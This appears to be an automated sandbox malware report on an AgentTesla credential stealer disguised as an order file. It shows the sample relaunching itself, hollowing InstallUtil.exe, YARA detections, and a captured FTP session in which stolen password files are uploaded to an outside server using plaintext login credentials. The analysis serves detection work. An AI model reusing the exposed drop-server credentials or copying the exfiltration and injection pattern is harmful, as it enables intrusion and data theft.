                                        Oct 9, 2024 10:51:06.533163071 CEST21497315.2.84.236192.168.2.4200 TYPE is now 8-bit binary
                                        Oct 9, 2024 10:51:06.533437967 CEST4973121192.168.2.45.2.84.236PASV
                                        Oct 9, 2024 10:51:06.758912086 CEST21497315.2.84.236192.168.2.4227 Entering Passive Mode (5,2,84,236,211,156)
                                        Oct 9, 2024 10:51:06.765173912 CEST4973121192.168.2.45.2.84.236STOR PW_user-618321_2024_10_09_04_51_03.html
                                        Oct 9, 2024 10:51:07.397644043 CEST21497315.2.84.236192.168.2.4150 Accepted data connection
                                        Oct 9, 2024 10:51:07.624701977 CEST21497315.2.84.236192.168.2.4226-File successfully transferred
                                        226-File successfully transferred226 0.227 seconds (measured here), 1.37 Kbytes per second
                                        Oct 9, 2024 10:51:21.326148033 CEST21497405.2.84.236192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 9, 2024 10:51:21.326410055 CEST  49740  21  192.168.2.4  5.2.84.236  USER fgghv@alternatifplastik.com
                                        Oct 9, 2024 10:51:21.545527935 CEST  21  49740  5.2.84.236  192.168.2.4  331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 9, 2024 10:51:21.546813965 CEST  49740  21  192.168.2.4  5.2.84.236  PASS Fineboy777@
                                        Oct 9, 2024 10:51:21.791490078 CEST  21  49740  5.2.84.236  192.168.2.4  230 OK. Current restricted directory is /
                                        Oct 9, 2024 10:51:22.010991096 CEST  21  49740  5.2.84.236  192.168.2.4  504 Unknown command
                                        Oct 9, 2024 10:51:22.011218071 CEST  49740  21  192.168.2.4  5.2.84.236  PWD
                                        Oct 9, 2024 10:51:22.230489016 CEST  21  49740  5.2.84.236  192.168.2.4  257 "/" is your current location
                                        Oct 9, 2024 10:51:22.230655909 CEST  49740  21  192.168.2.4  5.2.84.236  TYPE I
                                        Oct 9, 2024 10:51:22.452299118 CEST  21  49740  5.2.84.236  192.168.2.4  200 TYPE is now 8-bit binary
                                        Oct 9, 2024 10:51:22.453718901 CEST  49740  21  192.168.2.4  5.2.84.236  PASV
                                        Oct 9, 2024 10:51:22.673631907 CEST  21  49740  5.2.84.236  192.168.2.4  227 Entering Passive Mode (5,2,84,236,233,230)
                                        Oct 9, 2024 10:51:22.680289984 CEST  49740  21  192.168.2.4  5.2.84.236  STOR PW_user-618321_2024_10_09_04_51_19.html
                                        Oct 9, 2024 10:51:23.289320946 CEST  21  49740  5.2.84.236  192.168.2.4  150 Accepted data connection
                                        Oct 9, 2024 10:51:23.509576082 CEST  21  49740  5.2.84.236  192.168.2.4  226-File successfully transferred
                                        226 0.221 seconds (measured here), 1.41 Kbytes per second
                                        Oct 9, 2024 10:51:29.896641016 CEST  21  49743  5.2.84.236  192.168.2.4  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                        220-You are user number 3 of 100 allowed.
                                        220-Local time is now 11:51. Server port: 21.
                                        220-This is a private system - No anonymous login
                                        220-IPv6 connections are also welcome on this server.
                                        220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 9, 2024 10:51:29.923542023 CEST  49743  21  192.168.2.4  5.2.84.236  USER fgghv@alternatifplastik.com
                                        Oct 9, 2024 10:51:30.158037901 CEST  21  49743  5.2.84.236  192.168.2.4  331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 9, 2024 10:51:30.167351007 CEST  49743  21  192.168.2.4  5.2.84.236  PASS Fineboy777@
                                        Oct 9, 2024 10:51:30.409931898 CEST  21  49743  5.2.84.236  192.168.2.4  230 OK. Current restricted directory is /
                                        Oct 9, 2024 10:51:30.633862972 CEST  21  49743  5.2.84.236  192.168.2.4  504 Unknown command
                                        Oct 9, 2024 10:51:30.634056091 CEST  49743  21  192.168.2.4  5.2.84.236  PWD
                                        Oct 9, 2024 10:51:30.858278990 CEST  21  49743  5.2.84.236  192.168.2.4  257 "/" is your current location
                                        Oct 9, 2024 10:51:30.858453035 CEST  49743  21  192.168.2.4  5.2.84.236  TYPE I
                                        Oct 9, 2024 10:51:31.082277060 CEST  21  49743  5.2.84.236  192.168.2.4  200 TYPE is now 8-bit binary
                                        Oct 9, 2024 10:51:31.082462072 CEST  49743  21  192.168.2.4  5.2.84.236  PASV
                                        Oct 9, 2024 10:51:31.306466103 CEST  21  49743  5.2.84.236  192.168.2.4  227 Entering Passive Mode (5,2,84,236,199,14)
                                        Oct 9, 2024 10:51:31.312442064 CEST  49743  21  192.168.2.4  5.2.84.236  STOR PW_user-618321_2024_10_09_04_51_28.html
                                        Oct 9, 2024 10:51:31.936820030 CEST  21  49743  5.2.84.236  192.168.2.4  150 Accepted data connection
                                        Oct 9, 2024 10:51:32.161956072 CEST  21  49743  5.2.84.236  192.168.2.4  226-File successfully transferred
                                        226 0.225 seconds (measured here), 1.39 Kbytes per second


                                        Target ID:0
                                        Start time:04:50:56
                                        Start date:09/10/2024
                                        Path:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                                        Imagebase:0xf50000
                                        File size:9'728 bytes
                                        MD5 hash:0C3D0B4CD6833A23EBC0687D97C64D73
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1727745948.0000000004480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1716960379.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1735614547.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:04:51:02
                                        Start date:09/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0xb70000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1879017395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1884023773.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1884023773.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:04:51:14
                                        Start date:09/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                                        Imagebase:0x370000
                                        File size:9'728 bytes
                                        MD5 hash:0C3D0B4CD6833A23EBC0687D97C64D73
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1881514343.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1903361036.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 16%, ReversingLabs
                                        • Detection: 26%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:04:51:19
                                        Start date:09/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x5a0000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1966127439.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1966127439.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:7
                                        Start time:04:51:22
                                        Start date:09/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Cbgoomiexw.exe"
                                        Imagebase:0xcc0000
                                        File size:9'728 bytes
                                        MD5 hash:0C3D0B4CD6833A23EBC0687D97C64D73
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1996337104.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1965310119.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:8
                                        Start time:04:51:27
                                        Start date:09/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0xe10000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2913625192.000000000330E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2913625192.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false


                                          Execution Graph

                                          Execution Coverage:11.9%
                                          Dynamic/Decrypted Code Coverage:98.4%
                                          Signature Coverage:2.5%
                                          Total number of Nodes:567
                                          Total number of Limit Nodes:51
65356->65344 65357->65356 65358 6ee3758 VirtualProtect 65357->65358 65359 6ee3760 VirtualProtect 65357->65359 65358->65357 65359->65357 64665 6f16d61 64666 6f16d6b 64665->64666 64670 6d79d49 64666->64670 64679 6d79d58 64666->64679 64667 6f16cc2 64671 6d79d58 64670->64671 64688 6d7a313 64671->64688 64693 6d79d88 64671->64693 64698 6d79d98 64671->64698 64703 6d79e2a 64671->64703 64708 6d7a2af 64671->64708 64713 6d7a2df 64671->64713 64672 6d79d83 64672->64667 64680 6d79d6d 64679->64680 64682 6d7a313 2 API calls 64680->64682 64683 6d7a2df 2 API calls 64680->64683 64684 6d7a2af 2 API calls 64680->64684 64685 6d79e2a 2 API calls 64680->64685 64686 6d79d98 2 API calls 64680->64686 64687 6d79d88 2 API calls 64680->64687 64681 6d79d83 64681->64667 64682->64681 64683->64681 64684->64681 64685->64681 64686->64681 64687->64681 64689 6d79e14 64688->64689 64690 6d7a1df 64689->64690 64691 6ee3758 VirtualProtect 64689->64691 64692 6ee3760 VirtualProtect 64689->64692 64690->64672 64691->64689 64692->64689 64695 6d79d98 64693->64695 64694 6d7a1df 64694->64672 64695->64694 64696 6ee3758 VirtualProtect 64695->64696 64697 6ee3760 VirtualProtect 64695->64697 64696->64695 64697->64695 64699 6d79dc2 64698->64699 64700 6d7a1df 64699->64700 64701 6ee3758 VirtualProtect 64699->64701 64702 6ee3760 VirtualProtect 64699->64702 64700->64672 64701->64699 64702->64699 64705 6d79e14 64703->64705 64704 6d7a1df 64704->64672 64705->64703 64705->64704 64706 6ee3758 VirtualProtect 64705->64706 64707 6ee3760 VirtualProtect 64705->64707 64706->64705 64707->64705 64710 6d79e14 64708->64710 64709 6d7a1df 64709->64672 64710->64709 64711 6ee3758 VirtualProtect 64710->64711 64712 6ee3760 VirtualProtect 64710->64712 64711->64710 64712->64710 64714 6d7a1df 64713->64714 64715 6d79e14 64713->64715 64714->64672 64715->64714 64716 6ee3758 VirtualProtect 64715->64716 64717 6ee3760 VirtualProtect 64715->64717 64716->64715 64717->64715 65360 192ca40 65361 192ca86 GetCurrentProcess 65360->65361 65363 192cad1 
65361->65363 65364 192cad8 GetCurrentThread 65361->65364 65363->65364 65365 192cb15 GetCurrentProcess 65364->65365 65366 192cb0e 65364->65366 65367 192cb4b 65365->65367 65366->65365 65368 192cb73 GetCurrentThreadId 65367->65368 65369 192cba4 65368->65369 64718 6f5836e 64719 6f5838d 64718->64719 64722 6f5d1d0 64719->64722 64723 6f5d1f7 64722->64723 64726 6f5d620 64723->64726 64727 6f5d668 VirtualProtect 64726->64727 64729 6f501e5 64727->64729 64730 184d118 64731 184d130 64730->64731 64732 184d18b 64731->64732 64734 6f5dc88 64731->64734 64735 6f5dcb0 64734->64735 64738 6f5e148 64735->64738 64736 6f5dcd7 64739 6f5e175 64738->64739 64740 6f5d1d0 VirtualProtect 64739->64740 64742 6f5e30b 64739->64742 64741 6f5e2fc 64740->64741 64741->64736 64742->64736 65370 6ee2430 65371 6ee247e NtProtectVirtualMemory 65370->65371 65373 6ee24c8 65371->65373 64743 6f5556a 64746 6f5e540 64743->64746 64747 6f5e555 64746->64747 64750 6f5e590 64747->64750 64752 6f5e5b7 64750->64752 64754 6f5e698 64752->64754 64755 6f5e6d8 VirtualAlloc 64754->64755 64757 6f501e5 64755->64757
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                          • API String ID: 0-312445597
                                          • Opcode ID: d106c3852bfb77327d601343c08efa121ae02339851c501f4f5dd17ce219e0a2
                                          • Instruction ID: 35ea993d81b7be2900c0c57edb703f11a946decb8104d99faed275d1f261739e
                                          • Opcode Fuzzy Hash: d106c3852bfb77327d601343c08efa121ae02339851c501f4f5dd17ce219e0a2
                                          • Instruction Fuzzy Hash: DDB20534E402288FDB54CFA8C894BADB7B6BF88740F158599E505AB3A5DB74EC81CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                          • API String ID: 0-2546334966
                                          • Opcode ID: 29ac67313d6a0ea35e50f377e1ad81662be2cecf64f7dc7b476946ce68f11a3c
                                          • Instruction ID: 8e23f4a6c64e73b0440a92d3888bbe026ac78b0c0087b5369a3d388e4dfb0d7c
                                          • Opcode Fuzzy Hash: 29ac67313d6a0ea35e50f377e1ad81662be2cecf64f7dc7b476946ce68f11a3c
                                          • Instruction Fuzzy Hash: B622E534E40219CFDB64CF68C894BA9B7B6BF88744F1481A9E509AB3A5DB34DD81CF50

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fcq$8
                                          • API String ID: 0-89531850
                                          • Opcode ID: 550e0a34a4b8366f77553a197eeba178adee8692c9d6db6394269eb12a9d0f98
                                          • Instruction ID: 697c850b1b23a7f35a11eca2521eb617b04d636fde78acda9039da198d771bc0
                                          • Opcode Fuzzy Hash: 550e0a34a4b8366f77553a197eeba178adee8692c9d6db6394269eb12a9d0f98
                                          • Instruction Fuzzy Hash: 1842C275D006298FDB64DF69C854AD9B7B2BF89300F1486EAD40DA7351EB30AE85CF81

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fcq$h
                                          • API String ID: 0-1849521214
                                          • Opcode ID: c4240f051d6e71f42a3af6fef608c5ec9f1732a0db3a94f85ee1345b1c989238
                                          • Instruction ID: 660bd96a53853863efe2a1631234d0a2e14a855eae19bd4564c6c41b8cc89e3e
                                          • Opcode Fuzzy Hash: c4240f051d6e71f42a3af6fef608c5ec9f1732a0db3a94f85ee1345b1c989238
                                          • Instruction Fuzzy Hash: 9261E471D006298FEB64DF6ACC547D9BBB2BF89300F54C2AAC44DA7250EB305A85CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2
                                          • API String ID: 0-450215437
                                          • Opcode ID: 7db4428fe91a5f0fd92a0eaabc8515ec872f0026df866067cb4ccc8a5bc849bf
                                          • Instruction ID: 282f1feb40a60ead33a3e9d8409812cfc2285d31986a44a2d536df782eff265c
                                          • Opcode Fuzzy Hash: 7db4428fe91a5f0fd92a0eaabc8515ec872f0026df866067cb4ccc8a5bc849bf
                                          • Instruction Fuzzy Hash: 19C2A0B4E00228CFDB65DF69D884B99BBB6FB89300F1081E9D509AB355DB309E85CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: e57c556fe160147c58d61e0877cc3954fb624e0aa3686c2b35038ed5b82f0317
                                          • Instruction ID: 49dac6ac246ce92d146e43909614d9789c1830107a36d7fb87f7af2f26bf8163
                                          • Opcode Fuzzy Hash: e57c556fe160147c58d61e0877cc3954fb624e0aa3686c2b35038ed5b82f0317
                                          • Instruction Fuzzy Hash: 11F10574E05218CFEBA4CF69D994BA9BBF2FB49380F1084AAD41DAB255DB705D84CF10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 6d02af1c1734ab760716dab88356b7d11b67f242ac6e3a54da9fc6474adf13e2
                                          • Instruction ID: fae897a29fecc9c7f34c11370a87c1f1a6954d1991d40fce279fa5ff62fbb758
                                          • Opcode Fuzzy Hash: 6d02af1c1734ab760716dab88356b7d11b67f242ac6e3a54da9fc6474adf13e2
                                          • Instruction Fuzzy Hash: E6F1F674E05218CFEBA4CF69D984B99BBF2FB49380F1081AAD41DAB255DB705D84CF10
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06EE24B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: e51a5053a6adfc4da2a1b259c8fb36c0ed9d0d52c2de3141641edd74f02b48ce
                                          • Instruction ID: 66653a0c634338dede7b8d9056212a6f4616d5125b64c5a037700e5edba2d8be
                                          • Opcode Fuzzy Hash: e51a5053a6adfc4da2a1b259c8fb36c0ed9d0d52c2de3141641edd74f02b48ce
                                          • Instruction Fuzzy Hash: F32102B1D013499FCB10DFAAD984A9EFBF5FF48310F20842EE559A7240C7759A41CBA5
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06EE24B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 365fe2b26435ddb9d337d6d593b67f0a03db15274ae9fdeb5151bb0401d681ba
                                          • Instruction ID: 241ddfb25b2df147ece0e1fc6c526314b1f85dfe5fdf649aff768e9af04dd35d
                                          • Opcode Fuzzy Hash: 365fe2b26435ddb9d337d6d593b67f0a03db15274ae9fdeb5151bb0401d681ba
                                          • Instruction Fuzzy Hash: 582103B1D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A3240D775A901CBA0
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06EE358E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: e2e31e3e917123abe2289d2eae86ad7706d7fef9be8789cad9034591ad87520e
                                          • Instruction ID: 63f40bdc1e79c732edd3ab68c783053fe68604d99a630d1ee2a6e7ae4e0df7b6
                                          • Opcode Fuzzy Hash: e2e31e3e917123abe2289d2eae86ad7706d7fef9be8789cad9034591ad87520e
                                          • Instruction Fuzzy Hash: AD21E3B19003498FCB10DFAAC4456AEFBF4EF88324F14842AD459A7240DB74A945CFA5
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06EE358E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 07842053262da182da0bdf05855be056a841e8ddd086a85e108501d66449c9d3
                                          • Instruction ID: 84ad907a7dd0d9fa55452e3024a4ae347f4ffad351648b4282122681680da2f6
                                          • Opcode Fuzzy Hash: 07842053262da182da0bdf05855be056a841e8ddd086a85e108501d66449c9d3
                                          • Instruction Fuzzy Hash: BA11D6B1D003498EDB10DFAAC44569FFBF5EF88324F10842AD419A7240DB74A945CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Deq
                                          • API String ID: 0-948982800
                                          • Opcode ID: 15538f127c9ee83fcd65a1476ec0c8d0b3d2a8186ae0549199e900c4016a488c
                                          • Instruction ID: 6c2c2f61ae9e7945d2f5a465f0a9082411585407cc071ca73cb65b048dde67fb
                                          • Opcode Fuzzy Hash: 15538f127c9ee83fcd65a1476ec0c8d0b3d2a8186ae0549199e900c4016a488c
                                          • Instruction Fuzzy Hash: F4D1D474E00219CFDB54DFA9E994A9DBBB2FF88304F1081A9D409AB365DB34AD81CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH^q
                                          • API String ID: 0-2549759414
                                          • Opcode ID: e6fbe1b6448a712bbc1b1bbe15b77c8a7ff5d775f2103e599d946765412a8af0
                                          • Instruction ID: 580bdc62d479e07fc91d9e829140ba16a7874df802fbbe4ad6f76653f2e0b7e0
